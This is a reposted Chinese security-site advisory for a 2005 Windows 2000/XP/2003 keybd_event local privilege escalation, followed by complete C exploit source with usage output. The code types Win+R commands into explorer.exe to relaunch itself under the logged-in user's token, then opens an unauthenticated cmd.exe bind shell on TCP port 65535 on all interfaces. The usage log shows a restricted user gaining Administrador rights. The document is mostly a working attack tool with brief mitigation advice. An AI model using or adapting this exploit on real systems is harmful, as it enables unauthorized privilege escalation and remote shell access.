Microsoft Windows "keybd_event" Local Privilege Escalation Exploit

王朝system·作者佚名  2006-01-10

文章整理:天天安全网 作者:佚名 发布时间:2005-09-09

漏洞资料:http://www.haxorcitos.com/MSRC-6005bgs-EN.txt

危险程度:中等

影响范围:Microsoft Windows 2000/XP/2003

解决办法:截至本文发布时(2005-09)暂无官方补丁。根据上文的攻击场景,可行的缓解措施是:不要让通过 runas 启动的低权限进程与特权用户共用同一个交互式桌面;不要为服务启用“允许服务与桌面交互”(INTERACT_WITH_DESKTOP)。

------------------------------------------------------------------------------

/*

* Microsoft Windows keybd_event validation vulnerability.

* Local privilege elevation

*

* Credits: Andres Tarasco ( aT4r _@_ haxorcitos.com <http://haxorcitos.com>)

* Iñaki Lopez ( ilo _@_ reversing.org <http://reversing.org> )

*

* Platforms affected/tested:

*

* - Windows 2000

* - Windows XP

* - Windows 2003

*

*

* Original Advisory: http://www.haxorcitos.com

* http://www.reversing.org

*

* Exploit Date: 08 / 06 / 2005

*

* Original Advisory:

* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"

* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION

* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.

*

* Attack Scenario:

*

* a) An attacker who gains access to an unprivileged shell/application executed

* with the application runas.

* b) An attacker who gains access to a service with flags INTERACT_WITH_DESKTOP

*

* Impact:

*

* Because keyboard input synthesized with keybd_event() is not validated
* against the caller, a process on the interactive desktop can send keys to

* any other application on that desktop, regardless of the user that
* application runs as.

* By sending a few shortcut keys (Win+R, a command line, Enter) it is
* possible to execute code with the logged-in user's privileges and bypass

* the runas / service security restriction.

*

* Exploit usage:

*

* C:\>whoami

* AQUARIUS\Administrador

*

* C:\>runas /user:restricted cmd.exe

* Enter the password for restricted:

* Attempting to start cmd.exe as user "AQUARIUS\restricted" ...

*

*

* Microsoft Windows 2000 [Version 5.00.2195]

* (C) Copyright 1985-2000 Microsoft Corp.

*

* C:\WINNT\system32>cd \

*

* C:\>whoami

* AQUARIUS\restricted

*

* C:\>tlist.exe |find "explorer.exe"

* 1140 explorer.exe Program Manager

*

* C:\>c:\keybd.exe 1140

* HANDLE Found. Attacking =)

*

* C:\>nc localhost 65535

* Microsoft Windows 2000 [Versión 5.00.2195]

* (C) Copyright 1985-2000 Microsoft Corp.

*

* C:\>whoami

* whoami

* AQUARIUS\Administrador

*

*

* DONE =)

*

*/

#include <errno.h>

#include <limits.h>

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib") /* MSVC: link Winsock 2 without a makefile change */

/* TCP port the payload half (BindShell) listens on; matches the
 * "nc localhost 65535" step in the usage example above. */
#define HAXORCITOS 65535

/* Process id of the window owner to attack.  main() fills it from argv[1];
 * the EnumWindows() callback compares it with GetWindowThreadProcessId(). */
unsigned int pid = 0u;

/* Command line typed into the target's Run dialog.  main() copies argv[0]
 * (the path of this executable) into it.  Zero-filled at start-up, so it is
 * NUL-terminated even after a bounded copy that fills 255 bytes. */
char buf[256] = { 0 };

/**************************************************************/

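/*
 * EnumWindows() callback: find a top-level window owned by the target
 * process (global `pid`, explorer.exe in the usage example), bring it to
 * the foreground and type "<Win+R> <buf> <Enter>" with keybd_event(), so
 * that the desktop owner launches `buf` (our own path, argv[0]) under its
 * own token.
 *
 * hwnd   - window currently being enumerated.
 * lParam - opaque value from EnumWindows(); unused (main() passes the
 *          address of an HWND that nothing reads).
 *
 * Returns TRUE for every non-matching window so enumeration continues.
 * On a match it never returns: exit(1) is called right after the
 * keystrokes are queued (original behaviour, kept).
 *
 * Fix: the original declared this `void` and cast it to WNDENUMPROC.
 * EnumWindows() expects a `BOOL CALLBACK` and uses the return value to
 * decide whether to keep enumerating (and, on 32-bit builds, expects the
 * callee to clean up the stack), so the "continue" decision came from
 * whatever happened to be in the return register.  Declaring it
 * BOOL CALLBACK makes the cast in main() a no-op.
 *
 * NOTE(review): the key sequence is keyboard-layout dependent.
 * VkKeyScan() returns the required shift state in its high byte, which is
 * lost when the value is narrowed to keybd_event()'s BYTE parameter, so
 * modifiers are re-created by hand: ':' is sent as Shift+<key>, and '\\'
 * as Ctrl+Alt (AltGr) + the '?' key -- presumably correct for the authors'
 * Spanish layout; verify before relying on it elsewhere.  bScan is always
 * 1 rather than a real scan code.  The original carried a comment
 * suggesting SendMessage()/PostMessage() instead of keybd_event().
 */
BOOL CALLBACK ExplorerExecution(HWND hwnd, LPARAM lParam)
{
    DWORD owner_pid = 0;
    size_t len;
    size_t i;

    (void)lParam; /* never read; see header comment */

    GetWindowThreadProcessId(hwnd, &owner_pid);
    if (owner_pid != pid) {
        return TRUE; /* not the target: keep enumerating */
    }

    printf("HANDLE Found. Attacking =)\n");

    /* Make the target window active so the synthesized keys go to it.
     * The return value is ignored, as in the original: on failure the
     * keystrokes land in whichever window is currently active. */
    SetForegroundWindow(hwnd);

    /* Win+R opens the Run dialog of the desktop owner. */
    keybd_event(VK_LWIN, 1, 0, 0);
    keybd_event((BYTE)VkKeyScan('r'), 1, 0, 0);
    keybd_event(VK_LWIN, 1, KEYEVENTF_KEYUP, 0);
    keybd_event((BYTE)VkKeyScan('r'), 1, KEYEVENTF_KEYUP, 0);

    /* Type the command line one character at a time.  strlen() is hoisted
     * out of the loop condition: buf does not change while we type. */
    len = strlen(buf);
    for (i = 0; i < len; i++) {
        char c = buf[i];
        BYTE vk = (BYTE)VkKeyScan(c); /* low byte only: shift state dropped */

        if (c == ':') {
            /* Drive-letter separator: needs Shift on the layout this was
             * written for. */
            keybd_event(VK_SHIFT, 1, 0, 0);
            keybd_event(vk, 1, 0, 0);
            keybd_event(VK_SHIFT, 1, KEYEVENTF_KEYUP, 0);
            keybd_event(vk, 1, KEYEVENTF_KEYUP, 0);
        } else if (c == '\\') {
            /* Backslash: Ctrl+Alt (AltGr) + the '?' key. */
            BYTE q = (BYTE)VkKeyScan('?');
            keybd_event(VK_LMENU, 1, 0, 0);
            keybd_event(VK_CONTROL, 1, 0, 0);
            keybd_event(q, 1, 0, 0);
            keybd_event(VK_LMENU, 1, KEYEVENTF_KEYUP, 0);
            keybd_event(VK_CONTROL, 1, KEYEVENTF_KEYUP, 0);
            keybd_event(q, 1, KEYEVENTF_KEYUP, 0);
        } else {
            keybd_event(vk, 1, 0, 0);
            keybd_event(vk, 1, KEYEVENTF_KEYUP, 0);
        }
    }

    /* Enter: the desktop owner's explorer.exe starts the command, so the
     * new process runs with the logged-in user's token. */
    keybd_event(VK_RETURN, 1, 0, 0);
    keybd_event(VK_RETURN, 1, KEYEVENTF_KEYUP, 0);

    /* Original behaviour: terminate the injecting process immediately with
     * exit status 1 instead of finishing the enumeration. */
    exit(1);
    return FALSE; /* not reached */
}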

/**************************************************************/

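/*
 * Payload half of the exploit: bind a TCP listener on port HAXORCITOS
 * (65535), accept exactly one client and hand it an interactive cmd.exe
 * whose stdin/stdout/stderr are the connected socket.  Blocks until that
 * cmd.exe exits, then prints a marker, sleeps 5 s and returns.
 *
 * main() calls this when the program is started with no arguments, i.e.
 * when explorer.exe has re-launched us through the Run dialog under the
 * logged-in user's token.
 *
 * Returns 1 after the shell has exited, -1 if bind/listen/accept or
 * CreateProcess fails.  Winsock initialisation or socket creation failure
 * terminates the process with exit(1), as in the original.
 *
 * Fixes relative to the original listing:
 *  - accept() failure was not checked; INVALID_SOCKET went straight into
 *    CreateProcess() as the child's standard handles.
 *  - the PROCESS_INFORMATION handles were leaked and WSAStartup() was
 *    never balanced by WSACleanup().
 *  - the listening socket was closed twice.
 *  - the failure path called doFormatMessage(), which is not defined
 *    anywhere in this listing; the raw GetLastError() code is printed.
 *
 * Security note (behaviour unchanged): the listener is bound to INADDR_ANY
 * and there is no authentication, so anyone who can reach TCP/65535 on the
 * host gets the shell, not only the `nc localhost 65535` of the usage
 * example.  Use INADDR_LOOPBACK for a local-only proof of concept.
 *
 * WSASocket() with dwFlags = 0 is deliberate: plain socket() creates an
 * overlapped handle that cannot serve as a console/standard handle.
 */
int BindShell(void)
{
    SOCKET listener;
    SOCKET client;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    WSADATA wsa;
    struct sockaddr_in addr;
    int addrlen;

    if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {
        exit(1);
    }

    listener = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);
    if (listener == INVALID_SOCKET) {
        exit(1);
    }

    ZeroMemory(&addr, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = (USHORT)htons(HAXORCITOS);
    addr.sin_addr.s_addr = htonl(INADDR_ANY); /* all interfaces: see security note */

    if (bind(listener, (struct sockaddr *)&addr, sizeof(addr)) == SOCKET_ERROR ||
        listen(listener, 1) == SOCKET_ERROR) {
        closesocket(listener);
        WSACleanup();
        return -1;
    }

    addrlen = sizeof(addr);
    client = accept(listener, (struct sockaddr *)&addr, &addrlen);
    closesocket(listener); /* one client only; the listener is done */
    if (client == INVALID_SOCKET) {
        WSACleanup();
        return -1;
    }

    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.cb = sizeof(si);
    si.wShowWindow = SW_HIDE;
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    /* The socket handle doubles as the child's three standard handles;
     * bInheritHandles = TRUE below is what lets cmd.exe use it. */
    si.hStdInput = (HANDLE)client;
    si.hStdOutput = (HANDLE)client;
    si.hStdError = (HANDLE)client;

    if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) {
        fprintf(stderr, "CreateProcess failed: %lu\n", (unsigned long)GetLastError());
        closesocket(client);
        WSACleanup();
        return -1;
    }

    /* Block until the shell exits, then release the process handles. */
    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);

    closesocket(client);
    printf("SALIMOS...\n");
    Sleep(5000);
    WSACleanup();
    return 1;
}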

/**************************************************************/

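/*
 * Entry point.  Two modes, selected by the argument count:
 *
 *   keybd.exe <pid>  injector: <pid> is the process id of a window-owning
 *                    process on the interactive desktop (explorer.exe in
 *                    the usage example).  Copies our own path (argv[0])
 *                    into `buf` and walks the top-level windows with
 *                    EnumWindows(); the callback types that path into the
 *                    target's Run dialog so we are re-launched under the
 *                    desktop owner's token.
 *   keybd.exe        payload: no arguments means the target launched us;
 *                    serve the bind shell on TCP/65535.
 *
 * Returns 0, or 2 when <pid> is not a positive decimal number.  The
 * original used atoi() and, for garbage input, silently enumerated with
 * pid 0, which never matches any window.
 *
 * Fixes: `void main` -> `int main`; the (long) cast on the EnumWindows()
 * lParam truncates pointers on 64-bit builds, LPARAM is the correct type;
 * the argv[0] copy is explicitly NUL-terminated instead of relying on the
 * global's zero fill.
 *
 * NOTE(review): argv[0] is whatever the parent passed -- typically the
 * path as typed.  The usage example uses an absolute path (c:\keybd.exe);
 * a relative one would be resolved against explorer's working directory,
 * not ours, and the re-launch would fail.
 */
int main(int argc, char *argv[])
{
    HWND console_wnd = NULL;

    if (argc < 2) {
        BindShell();
        return 0;
    }

    {
        char *end = NULL;
        unsigned long v;

        errno = 0;
        v = strtoul(argv[1], &end, 10);
        if (end == argv[1] || *end != '\0' || errno == ERANGE || v == 0 || v > UINT_MAX) {
            fprintf(stderr, "usage: %s <pid>\n", argv[0]);
            return 2;
        }
        pid = (unsigned int)v;
    }

    /* Bounded copy of our own path; the explicit terminator makes this
     * safe even if buf were ever reused. */
    strncpy(buf, argv[0], sizeof(buf) - 1);
    buf[sizeof(buf) - 1] = '\0';

    /* The callback never reads lParam; the address is passed through
     * unchanged from the original. */
    EnumWindows((WNDENUMPROC)ExplorerExecution, (LPARAM)&console_wnd);
    return 0;
}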

/**************************************************************/

 
 
 